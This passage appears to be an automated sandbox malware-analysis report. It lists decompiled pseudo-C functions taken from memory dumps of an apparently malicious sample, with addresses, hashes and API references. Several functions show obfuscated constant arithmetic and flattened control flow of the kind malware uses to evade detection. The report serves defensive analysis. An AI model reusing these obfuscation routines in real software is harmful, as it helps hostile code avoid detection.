							_t110 = _t108 - 1;
							__eflags = _t110;
							if(_t110 == 0) {
								E00248F78(_v60,  &_v52);
							} else {
								_t112 = _t110 - 1;
								__eflags = _t112;
								if(_t112 == 0) {
									E002526F5(_v60,  &_v52);
								} else {
									_t114 = _t112 - 1;
									__eflags = _t114;
									if(_t114 == 0) {
										E00244A35(_v60,  &_v52);
									} else {
										__eflags = _t114 == 6;
										if(_t114 == 6) {
											E002469A0(_v60,  &_v52);
										}
									}
								}
							}
						}
						_t142 = _t142 + 1;
						__eflags = _t142;
					}
					goto L13;
				}
				return _t142;
			}

0x002571ef
0x002571fa
0x002571ff
0x00257201
0x00257206
0x00257210
0x00257219
0x00257220
0x00257222
0x00257229
0x00257230
0x00257237
0x0025723b
0x00257242
0x00257249
0x00257250
0x00257254
0x0025725e
0x00257260
0x00257263
0x0025726a
0x00257271
0x00257275
0x0025727c
0x0025727f
0x00257286
0x0025728d
0x00257290
0x00257297
0x0025729e
0x002572a2
0x002572a9
0x002572b0
0x002572bb
0x002572be
0x002572c5
0x002572cc
0x002572d3
0x002572da
0x002572ec
0x002572ef
0x002572f6
0x00257306
0x0025730b
0x00257384
0x0025739e
0x00257324
0x00257329
0x0025732c
0x0025732e
0x00257333
0x00257333
0x00257334
0x0025737e
0x00257336
0x00257336
0x00257336
0x00257337
0x00257371
0x00257339
0x00257339
0x00257339
0x0025733a
0x00257364
0x0025733c
0x0025733c
0x0025733c
0x0025733d
0x00257357
0x0025733f
0x0025733f
0x00257342
0x0025734a
0x0025734a
0x00257342
0x0025733d
0x0025733a
0x00257337
0x00257383
0x00257383
0x00257383
0x00000000
0x0025732e
0x002573ab

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e60bb529e95b2fd998923d9e3cb4c74cf202ff18c9249fb7b0ce3a5257b475f
Instruction ID: de919cc1e0ccec6da04d410533b74fa8ed15c5e3ac53d37f7e7a76b0bd674094
Opcode Fuzzy Hash: 9e60bb529e95b2fd998923d9e3cb4c74cf202ff18c9249fb7b0ce3a5257b475f
Instruction Fuzzy Hash: 10516871D2421EEBDF08CFA0D8858EEBBB5FF44324F108199D811B6290D7B85A59CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00258ADC, Relevance: .1, Instructions: 114
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00258ADC(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v304;
				char _t109;
				void* _t115;
				signed int _t117;
				signed int _t118;
				signed int _t119;
				char* _t120;
				intOrPtr* _t139;
				void* _t140;

				_v44 = 0xbe2c;
				_v44 = _v44 | 0x84c59b93;
				_v44 = _v44 ^ 0x84c5dc14;
				_v12 = 0x6fb6;
				_v12 = _v12 << 0xc;
				_t139 = __ecx;
				_t117 = 0x2e;
				_v12 = _v12 / _t117;
				_v12 = _v12 + 0xcda3;
				_v12 = _v12 ^ 0x0027e688;
				_v28 = 0xcabb;
				_v28 = _v28 + 0xd310;
				_v28 = _v28 | 0x3c203c9f;
				_v28 = _v28 ^ 0x3c2189d4;
				_v36 = 0x4eab;
				_v36 = _v36 | 0x84b19700;
				_v36 = _v36 ^ 0x84b1b180;
				_v8 = 0xd8ee;
				_v8 = _v8 + 0xffff63d4;
				_v8 = _v8 ^ 0xfc264e39;
				_v8 = _v8 ^ 0x6fc556fb;
				_v8 = _v8 ^ 0x93e330d5;
				_v20 = 0x5c82;
				_v20 = _v20 | 0x7a047e0a;
				_v20 = _v20 << 5;
				_t118 = 0x1b;
				_v20 = _v20 * 0x43;
				_v20 = _v20 ^ 0xe5a3df6f;
				_v40 = 0x7499;
				_v40 = _v40 >> 8;
				_v40 = _v40 ^ 0x0000130c;
				_v16 = 0x5702;
				_v16 = _v16 << 8;
				_v16 = _v16 << 6;
				_v16 = _v16 + 0xffffa72f;
				_v16 = _v16 ^ 0x15c040b7;
				_v32 = 0x67e1;
				_v32 = _v32 / _t118;
				_v32 = _v32 ^ 0x8e6cf5d6;
				_v32 = _v32 ^ 0x8e6ccf96;
				_v24 = 0x77;
				_t119 = 0x69;
				_v24 = _v24 * 0x25;
				_t120 =  &_v304;
				_v24 = _v24 / _t119;
				_v24 = _v24 ^ 0x863bea64;
				_v24 = _v24 ^ 0x863bfaf8;
				while(1) {
					_t109 =  *_t139;
					if(_t109 == 0) {
						break;
					}
					if(_t109 == 0x2e) {
						 *_t120 = 0;
					} else {
						 *_t120 = _t109;
						_t120 = _t120 + 1;
						_t139 = _t139 + 1;
						continue;
					}
					L6:
					_t140 = E0024F22A(_v44, _v12,  &_v304, _v28);
					if(_t140 != 0) {
						L8:
						_push(E00258634(_v40, _t139 + 1, _v16) ^ 0x762b677b);
						_push(_t140);
						return E00250126(_v32, _v24);
					}
					_t115 = E00254AAF( &_v304, _v36, _v8, _v20);
					_t140 = _t115;
					if(_t140 != 0) {
						goto L8;
					}
					return _t115;
				}
				goto L6;
			}

0x00258ae5
0x00258aee
0x00258af5
0x00258afc
0x00258b03
0x00258b0e
0x00258b10
0x00258b15
0x00258b1a
0x00258b21
0x00258b28
0x00258b2f
0x00258b36
0x00258b3d
0x00258b44
0x00258b4b
0x00258b52
0x00258b59
0x00258b60
0x00258b67
0x00258b6e
0x00258b75
0x00258b7c
0x00258b83
0x00258b8a
0x00258b92
0x00258b95
0x00258b98
0x00258b9f
0x00258ba6
0x00258baa
0x00258bb1
0x00258bb8
0x00258bbc
0x00258bc0
0x00258bc7
0x00258bce
0x00258bdc
0x00258bdf
0x00258be6
0x00258bed
0x00258bf8
0x00258bf9
0x00258c01
0x00258c07
0x00258c0a
0x00258c11
0x00258c22
0x00258c22
0x00258c26
0x00000000
0x00000000
0x00258c1c
0x00258c2a
0x00258c1e
0x00258c1e
0x00258c20
0x00258c21
0x00000000
0x00258c21
0x00258c2d
0x00258c42
0x00258c48
0x00258c66
0x00258c7f
0x00258c80
0x00000000
0x00258c86
0x00258c59
0x00258c5e
0x00258c64
0x00000000
0x00000000
0x00258c8e
0x00258c8e
0x00000000

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94b0c3d6e61e61ea0f224150d988a8d30d783f5daa19532cd6a56022687b62a3
Instruction ID: 98e0b700ff3db2a78b031ca7a9153ce68c3c769ba216408db2d9e4c95d69863f
Opcode Fuzzy Hash: 94b0c3d6e61e61ea0f224150d988a8d30d783f5daa19532cd6a56022687b62a3
Instruction Fuzzy Hash: AC515371C0120ADFDF48CFA0C9465EEBBB1FB44314F20819AC412BA2A0D7B91B55CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 002448BD, Relevance: .1, Instructions: 107
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E002448BD(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				void* _t84;
				intOrPtr* _t95;
				signed int _t103;
				signed int _t104;
				void* _t105;
				signed int _t108;
				void* _t122;

				_t122 = __ecx;
				_push(0x25c110);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0024602B(_t84);
				_v48 = 0x61abc6;
				_v44 = 0;
				_v40 = 0;
				_v20 = 0x3115;
				_v20 = _v20 >> 0xf;
				_v20 = _v20 >> 0xb;
				_v20 = _v20 ^ 0x0000604b;
				_v16 = 0xb2e9;
				_v16 = _v16 >> 0xf;
				_v16 = _v16 + 0x4f02;
				_v16 = _v16 ^ 0x00000d08;
				_v8 = 0x47ff;
				_v8 = _v8 + 0xba3e;
				_t103 = 0x68;
				_v8 = _v8 / _t103;
				_t104 = 0x36;
				_v8 = _v8 * 0x26;
				_v8 = _v8 ^ 0x00006b48;
				_v12 = 0x7283;
				_v12 = _v12 + 0xffffff70;
				_v12 = _v12 >> 5;
				_v12 = _v12 | 0x62bbfeca;
				_v12 = _v12 ^ 0x62bbef9f;
				_v32 = 0x955e;
				_v32 = _v32 + 0x386b;
				_v32 = _v32 ^ 0x0000cdee;
				_v36 = 0x2587;
				_v36 = _v36 ^ 0xc63d9950;
				_v36 = _v36 ^ 0xc63dc5f3;
				_v28 = 0xb9df;
				_v28 = _v28 ^ 0xf1a14283;
				_v28 = _v28 * 0x63;
				_v28 = _v28 ^ 0x71a43d80;
				_v24 = 0x4453;
				_v24 = _v24 << 3;
				_t105 = 0x4c;
				_v24 = _v24 / _t104;
				_v24 = _v24 ^ 0x00004bab;
				_t95 = E00248736(_t105);
				 *0x25ca38 = _t95;
				if(_t95 == 0) {
					L7:
					return 0;
				}
				_t108 =  *(_t95 + 0x3c);
				 *((intOrPtr*)(_t95 + 0x14)) = 0x25c110;
				 *_t95 = 0x25c110;
				 *((intOrPtr*)(_t95 + 0x24)) = 0;
				while( *((intOrPtr*)(0x25c110 + _t108 * 8)) != 0) {
					_t108 = _t108 + 1;
					 *(_t95 + 0x3c) = _t108;
				}
				if(E00241CFA(_v32, _t122) == 0) {
					E0024F536(_v36, _v28, _v24,  *0x25ca38);
					goto L7;
				}
				return 1;
			}

0x002448cb
0x002448cd
0x002448ce
0x002448d1
0x002448d4
0x002448d5
0x002448d6
0x002448db
0x002448e4
0x002448e9
0x002448ec
0x002448f3
0x002448f7
0x002448fb
0x00244902
0x00244909
0x0024490d
0x00244914
0x0024491b
0x00244922
0x0024492e
0x00244933
0x0024493c
0x00244940
0x00244943
0x0024494a
0x00244951
0x00244958
0x0024495c
0x00244963
0x0024496a
0x00244971
0x00244978
0x0024497f
0x00244986
0x0024498d
0x00244994
0x0024499b
0x002449a8
0x002449ab
0x002449b2
0x002449b9
0x002449c2
0x002449c3
0x002449c6
0x002449d6
0x002449db
0x002449e4
0x00244a2c
0x00000000
0x00244a2c
0x002449e6
0x002449e9
0x002449ec
0x002449ee
0x002449f7
0x002449f3
0x002449f4
0x002449f4
0x00244a0f
0x00244a25
0x00000000
0x00244a2b
0x00000000

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6040ce223e63e663660e7c282ca4e66ab98539d7a1d28ceca6d814e1f4394adf
Instruction ID: 01ddb7960a61070386f8248c390cd9f52dbf02ee710c7ee7246a509c08700509
Opcode Fuzzy Hash: 6040ce223e63e663660e7c282ca4e66ab98539d7a1d28ceca6d814e1f4394adf
Instruction Fuzzy Hash: A04166B2C10209EFEB08CFA5D98A4EEFBB1FF44314F20805AD501BA290D7B84A44CF94

Uniqueness

Uniqueness Score: -1.00%

Function 002567E9, Relevance: .1, Instructions: 78
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E002567E9() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				void* _t116;
				intOrPtr* _t143;
				intOrPtr _t146;
				void* _t151;
				void* _t152;

				_t152 = _t151 - 0x2c;
				_v8 = 0xa05a;
				_v8 = _v8 | 0x4de4d3b6;
				_push(0x77);
				_t143 = 0x25ca24;
				_push(0x67);
				_v8 = _v8 / 0;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 ^ 0x000036e5;
				_v44 = 0x8c67;
				_v44 = _v44 * 0x22;
				_v44 = _v44 ^ 0x00129d81;
				_v24 = 0xef;
				_v24 = _v24 + 0xffff82ae;
				_v24 = _v24 >> 4;
				_v24 = _v24 ^ 0x0fffc315;
				_v12 = 0xac64;
				_v12 = _v12 >> 6;
				_v12 = _v12 / 0;
				_v12 = _v12 ^ 0x56eede11;
				_v12 = _v12 ^ 0x56ee9803;
				_v32 = 0x5470;
				_v32 = _v32 >> 1;
				_v32 = _v32 << 7;
				_v32 = _v32 ^ 0x00150b15;
				_v36 = 0xc745;
				_v36 = _v36 >> 0xb;
				_v36 = _v36 >> 8;
				_v36 = _v36 ^ 0x00006261;
				_v16 = 0x5384;
				_v16 = _v16 | 0x59782290;
				_v16 = _v16 << 2;
				_v16 = _v16 + 0xffff2741;
				_v16 = _v16 ^ 0x65e0bd40;
				_v20 = 0x334d;
				_v20 = _v20 | 0xb04f2549;
				_v20 = _v20 + 0xf20e;
				_v20 = _v20 + 0x9932;
				_v20 = _v20 ^ 0xb050c5c9;
				_v40 = 0xe415;
				_v40 = _v40 * 0x55;
				_v40 = _v40 + 0x2e22;
				_v40 = _v40 ^ 0x004bf03f;
				_v48 = 0x3d8d;
				_v48 = _v48 << 1;
				_v48 = _v48 ^ 0x00006d20;
				_v28 = 0x48e5;
				_v28 = _v28 << 3;
				_v28 = _v28 << 0xe;
				_v28 = _v28 ^ 0x91ca0000;
				_t146 =  *0x25ca24; // 0x0
				while(_t146 != 0) {
					if( *((intOrPtr*)(_t146 + 0x28)) == 0) {
						L5:
						 *_t143 =  *((intOrPtr*)(_t146 + 0x2c));
						_t116 = E0024F536(_v20, _v40, _v48, _t146);
					} else {
						_t116 = E0025086F(_v8, _v44,  *((intOrPtr*)(_t146 + 0x1c)), 0, _v24);
						_t152 = _t152 + 0xc;
						if(_t116 != _v28) {
							_t108 = _t146 + 0x2c; // 0x2c
							_t143 = _t108;
						} else {
							 *((intOrPtr*)(_t146 + 4))( *((intOrPtr*)(_t146 + 0x28)), 0, 0);
							E0025422C(_v12,  *((intOrPtr*)(_t146 + 0x28)), _v32);
							E00254F7D(_v36, _v16,  *((intOrPtr*)(_t146 + 0x1c)));
							goto L5;
						}
					}
					_t146 =  *_t143;
				}
				return _t116;
			}

0x002598a6
0x002598a9
0x002598b2
0x002598bf
0x002598c3
0x002598cb
0x002598cd
0x002598d2
0x002598d6
0x002598dd
0x002598e9
0x002598ec
0x002598f3
0x002598fa
0x00259901
0x00259905
0x0025990c
0x00259913
0x0025991c
0x0025991f
0x00259926
0x0025992d
0x00259934
0x00259937
0x0025993b
0x00259942
0x00259949
0x0025994d
0x00259951
0x00259958
0x0025995f
0x00259966
0x0025996a
0x00259971
0x00259978
0x0025997f
0x00259986
0x0025998d
0x00259994
0x0025999b
0x002599a6
0x002599a9
0x002599b0
0x002599b7
0x002599be
0x002599c1
0x002599c8
0x002599cf
0x002599d3
0x002599d7
0x002599de
0x00259a46
0x002599ea
0x00259a2e
0x00259a3b
0x00259a3d
0x002599ec
0x002599f9
0x002599fe
0x00259a04
0x00259a51
0x00259a51
0x00259a06
0x00259a0d
0x00259a19
0x00259a27
0x00000000
0x00259a2d
0x00259a04
0x00259a44
0x00259a44
0x00259a50

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9efeecd22ec748fecd42a79a92aab87f1758bc41987ed21efb88f463ef7091c6
Instruction ID: 9bdf642e03a6c72081ef559689f131d0d6a9077073c88519cf2fcb111af1868b
Opcode Fuzzy Hash: 9efeecd22ec748fecd42a79a92aab87f1758bc41987ed21efb88f463ef7091c6
Instruction Fuzzy Hash: BC410171D0131DDBDB48CFA5D68A4DEBBB0FB14758F208059C515BA290D7B80B49CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00257A0F, Relevance: .1, Instructions: 66
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00257A0F(void* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _t43;
				void* _t47;
				void* _t50;
				void* _t56;
				void* _t57;

				_t50 = __ecx;
				_v16 = 0xca2c;
				_v16 = _v16 ^ 0x4de68128;
				_v16 = _v16 ^ 0x4de62eb9;
				_v8 = 0x8c11;
				_v8 = _v8 + 0x5792;
				_v8 = _v8 ^ 0x1f44ca2d;
				_v8 = _v8 << 0xa;
				_v8 = _v8 ^ 0x10a60930;
				_v28 = 0x568d;
				_v28 = _v28 >> 6;
				_v28 = _v28 ^ 0x00005e22;
				_v24 = 0x104e;
				_v24 = _v24 << 0x10;
				_v24 = _v24 ^ 0x104e2f39;
				_v20 = 0x2b0b;
				_v20 = _v20 << 5;
				_v20 = _v20 ^ 0x000512d1;
				_v12 = 0x980d;
				_v12 = _v12 + 0x309b;
				_v12 = _v12 >> 1;
				_t56 = 0;
				_v12 = _v12 ^ 0x00001aed;
				_t43 = 0xce8bfa4;
				do {
					while(_t43 != 0xce8bfa4) {
						if(_t43 == 0x19c25828) {
							_push(_t50);
							_t47 = E00257F1B();
							_t57 = _t57 + 4;
							_t56 = _t56 + _t47;
							_t43 = 0x375743b0;
							continue;
						} else {
							if(_t43 != 0x375743b0) {
								goto L8;
							} else {
								_t56 = _t56 + E0024D64E(_v28, _v24, _v20, _t50 + 4, _v12);
							}
						}
						L5:
						return _t56;
					}
					_t43 = 0x19c25828;
					L8:
				} while (_t43 != 0x2a4614b);
				goto L5;
			}

0x00257a0f
0x00257a15
0x00257a21
0x00257a28
0x00257a2f
0x00257a36
0x00257a3d
0x00257a44
0x00257a48
0x00257a4f
0x00257a56
0x00257a5a
0x00257a61
0x00257a68
0x00257a6c
0x00257a73
0x00257a7a
0x00257a7e
0x00257a86
0x00257a92
0x00257a99
0x00257aa3
0x00257aa5
0x00257aac
0x00257aae
0x00257aae
0x00257ab4
0x00257ae3
0x00257ae4
0x00257ae9
0x00257aec
0x00257aee
0x00000000
0x00257ab6
0x00257ab8
0x00000000
0x00257aba
0x00257ad2
0x00257ad2
0x00257ab8
0x00257ad5
0x00257adc
0x00257adc
0x00257af2
0x00257af4
0x00257af4
0x00000000

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 362bc142d129daebced84241c2bae281a61a82d17f508644e8d31eb90b62e200
Instruction ID: 6917ceabbe74c3c6853fe26c2dccf8158559e121d28fbd5d75e4591735271ca7
Opcode Fuzzy Hash: 362bc142d129daebced84241c2bae281a61a82d17f508644e8d31eb90b62e200
Instruction Fuzzy Hash: 5421ACB1E10219ABDB44DFA4E88A4AFFBB0FB40309F648059D905B3241E3B54B58CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0025687F, Relevance: .1, Instructions: 60
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E0025687F(void* __ecx, signed int __edx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				signed int _t63;
				signed int _t72;

				_v32 = 4;
				_v8 = 0xaf15;
				_v8 = _v8 << 0xf;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 + 0x6e7b;
				_v8 = _v8 ^ 0x2016511b;
				_v24 = 0x477;
				_v24 = _v24 + 0xffffb380;
				_t72 = 0x7f;
				_v24 = _v24 / _t72;
				_v24 = _v24 ^ 0x02042a92;
				_v20 = 0x93b6;
				_v20 = _v20 * 0x30;
				_v20 = _v20 ^ 0x44f1257f;
				_v20 = _v20 ^ 0x44eaddee;
				_v16 = 0x6bfa;
				_v16 = _v16 >> 0xa;
				_v16 = _v16 + 0xffff28a3;
				_v16 = _v16 ^ 0xffff7b62;
				_v28 = 0xaf58;
				_v28 = _v28 ^ 0x6486cb7d;
				_v28 = _v28 ^ 0x6486241a;
				_v12 = 0x7e30;
				_v12 = _v12 + 0x9611;
				_v12 = _v12 << 0xd;
				_v12 = _v12 ^ 0x22884747;
				_t63 = E0025674B( &_v36, _v24, __ecx, _v8 | __edx, __ecx, _v20,  &_v32, _v16, _v28, _v12);
				asm("sbb eax, eax");
				return  ~_t63 & _v36;
			}

0x00256885
0x0025688c
0x00256893
0x00256897
0x0025689b
0x002568a2
0x002568a9
0x002568b0
0x002568be
0x002568c5
0x002568c8
0x002568cf
0x002568da
0x002568e0
0x002568e7
0x002568ee
0x002568f5
0x002568f9
0x00256900
0x00256907
0x0025690e
0x00256915
0x0025691c
0x00256923
0x0025692a
0x0025692e
0x00256950
0x0025695a
0x00256964

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe6ba01be8fb5c0da9d2f06e75f2fa44d8968acd521b874d952cc1c4be9b7d87
Instruction ID: 8bd681a8ade85683859f66aecf50fe5d03dfa023db1b776e78d9eb643655b6a8
Opcode Fuzzy Hash: fe6ba01be8fb5c0da9d2f06e75f2fa44d8968acd521b874d952cc1c4be9b7d87
Instruction Fuzzy Hash: 5821E0B2D0021EABDB15CFE1C94A9EEFBB5FB14204F108299D521B61A0D3B84B59CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0024C4FF, Relevance: .0, Instructions: 2
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0024C4FF() {

				return  *[fs:0x30];
			}

0x0024c505

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 10007337, Relevance: 19.6, APIs: 13, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E10007337(void* __eax, void* __ebx) {
				intOrPtr _t5;
				intOrPtr _t6;
				intOrPtr _t7;
				LONG* _t8;
				void* _t9;
				void* _t14;
				void* _t24;
				intOrPtr* _t25;
				intOrPtr* _t26;

				_t14 = __ebx;
				__imp__DecodePointer( *0x10014d88);
				_t25 =  *0x100132dc; // 0x0
				_t24 = __eax;
				if(_t25 != 0) {
					while( *_t25 != 0) {
						E10004732( *_t25);
						_t25 = _t25 + 4;
						if(_t25 != 0) {
							continue;
						}
						break;
					}
					_t25 =  *0x100132dc; // 0x0
				}
				_push(_t14);
				E10004732(_t25);
				_t26 =  *0x100132d8; // 0x0
				 *0x100132dc = 0;
				if(_t26 != 0) {
					while( *_t26 != 0) {
						E10004732( *_t26);
						_t26 = _t26 + 4;
						if(_t26 != 0) {
							continue;
						}
						break;
					}
					_t26 =  *0x100132d8; // 0x0
				}
				E10004732(_t26);
				 *0x100132d8 = 0;
				E10004732( *0x100132d4);
				_t5 = E10004732( *0x100132d0);
				 *0x100132d4 = 0;
				 *0x100132d0 = 0;
				if(_t24 != 0xffffffff) {
					_t5 = E10004732(_t24);
				}
				__imp__EncodePointer(0);
				 *0x10014d88 = _t5;
				_t6 =  *0x10013c1c; // 0x0
				if(_t6 != 0) {
					E10004732(_t6);
					 *0x10013c1c = 0;
				}
				_t7 =  *0x10013c20; // 0x0
				if(_t7 != 0) {
					E10004732(_t7);
					 *0x10013c20 = 0;
				}
				_t8 = InterlockedDecrement( *0x10012394);
				if(_t8 == 0) {
					_t8 =  *0x10012394; // 0x10012690
					if(_t8 != 0x10012690) {
						_t9 = E10004732(_t8);
						 *0x10012394 = 0x10012690;
						return _t9;
					}
				}
				return _t8;
			}

0x10007337
0x1000733f
0x10007345
0x1000734b
0x1000734f
0x10007351
0x10007358
0x1000735e
0x10007361
0x00000000
0x00000000
0x00000000
0x10007361
0x10007363
0x10007363
0x10007369
0x1000736b
0x10007370
0x10007379
0x10007381
0x10007383
0x10007389
0x1000738f
0x10007392
0x00000000
0x00000000
0x00000000
0x10007392
0x10007394
0x10007394
0x1000739b
0x100073a6
0x100073ac
0x100073b7
0x100073bf
0x100073c5
0x100073ce
0x100073d1
0x100073d6
0x100073d8
0x100073de
0x100073e3
0x100073ea
0x100073ed
0x100073f3
0x100073f3
0x100073f9
0x10007400
0x10007403
0x10007409
0x10007409
0x10007415
0x1000741e
0x10007420
0x1000742c
0x1000742f
0x10007435
0x00000000
0x10007435
0x1000742c
0x1000743d

APIs

DecodePointer.KERNEL32(?,00000001,10004522,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?,00000001,?), ref: 1000733F
_free.LIBCMT ref: 10007358

Part of subcall function 10004732: HeapFree.KERNEL32(00000000,00000000), ref: 10004746
Part of subcall function 10004732: GetLastError.KERNEL32(00000000,?,100060FF,00000000), ref: 10004758

_free.LIBCMT ref: 1000736B
_free.LIBCMT ref: 10007389
_free.LIBCMT ref: 1000739B
_free.LIBCMT ref: 100073AC
_free.LIBCMT ref: 100073B7
_free.LIBCMT ref: 100073D1
EncodePointer.KERNEL32(00000000), ref: 100073D8
_free.LIBCMT ref: 100073ED
_free.LIBCMT ref: 10007403
InterlockedDecrement.KERNEL32 ref: 10007415
_free.LIBCMT ref: 1000742F

Memory Dump Source

Source File: 00000007.00000002.2107182626.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2107150063.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107205088.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107220492.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2107230746.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$Pointer$DecodeDecrementEncodeErrorFreeHeapInterlockedLast
String ID:
API String ID: 4264854383-0
Opcode ID: 47f49911c4d150f6d4b37a25648bd1e08eedf16aa526d4bf5ee7911870840c54
Instruction ID: 9ff3ff2e384702bc94cc79564f1671d498055a0f5ee0a3dca53a83b71b13782d
Opcode Fuzzy Hash: 47f49911c4d150f6d4b37a25648bd1e08eedf16aa526d4bf5ee7911870840c54
Instruction Fuzzy Hash: 76212CB59042319BFA00EF64DCC151937A4FB053E1712C06AE94CA726ACF38DE81AB94

Uniqueness

Uniqueness Score: -1.00%

Function 10002F70, Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 222
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E10002F70(void* __ecx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				char _v528;
				char _v1048;
				void* _v1052;
				void* _v1056;
				char _v1060;
				void* _v1064;
				char _v1068;
				char _v1084;
				char _v1100;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t63;
				char* _t67;
				intOrPtr* _t71;
				char _t72;
				intOrPtr _t75;
				intOrPtr* _t76;
				intOrPtr _t80;
				intOrPtr* _t81;
				intOrPtr* _t83;
				intOrPtr _t84;
				intOrPtr* _t85;
				intOrPtr _t86;
				intOrPtr* _t87;
				intOrPtr* _t89;
				intOrPtr _t93;
				intOrPtr* _t94;
				intOrPtr _t95;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr _t104;
				intOrPtr* _t109;
				intOrPtr _t110;
				intOrPtr _t112;
				intOrPtr* _t113;
				void* _t115;
				intOrPtr* _t120;
				intOrPtr* _t129;
				intOrPtr* _t130;
				intOrPtr* _t132;
				intOrPtr* _t136;
				signed int _t138;
				intOrPtr _t152;

				_t63 =  *0x10012158; // 0xb015c968
				_v8 = _t63 ^ _t138;
				_t137 = _a4;
				_t136 = _a8;
				_t115 = __ecx;
				E100043E0( &_v528, 0, 0x208);
				_t67 =  &_v528;
				__imp__PSStringFromPropertyKey(_a4, _t67, 0x104);
				if(_t67 < 0 || E10002730(_t136,  &_v1068) < 0) {
					L25:
					return E10003850(_t115, _v8 ^ _t138, _t134, _t136, _t137);
				} else {
					_t71 =  *((intOrPtr*)(_t115 + 0x18));
					_t134 =  &_v1064;
					_v1064 = 0;
					_t72 =  *((intOrPtr*)( *_t71 + 0xb4))(_t71,  &_v1064);
					if(_t72 != 0) {
						_t137 = 0x8000ffff;
						L24:
						__imp__CoTaskMemFree(_v1068);
						goto L25;
					}
					_t120 = _v1064;
					_t134 =  &_v1060;
					_v1060 = _t72;
					_v1056 = _t120;
					_t75 =  *((intOrPtr*)( *_t120 + 0x94))(_t120, L"ExtendedProperties",  &_v1060);
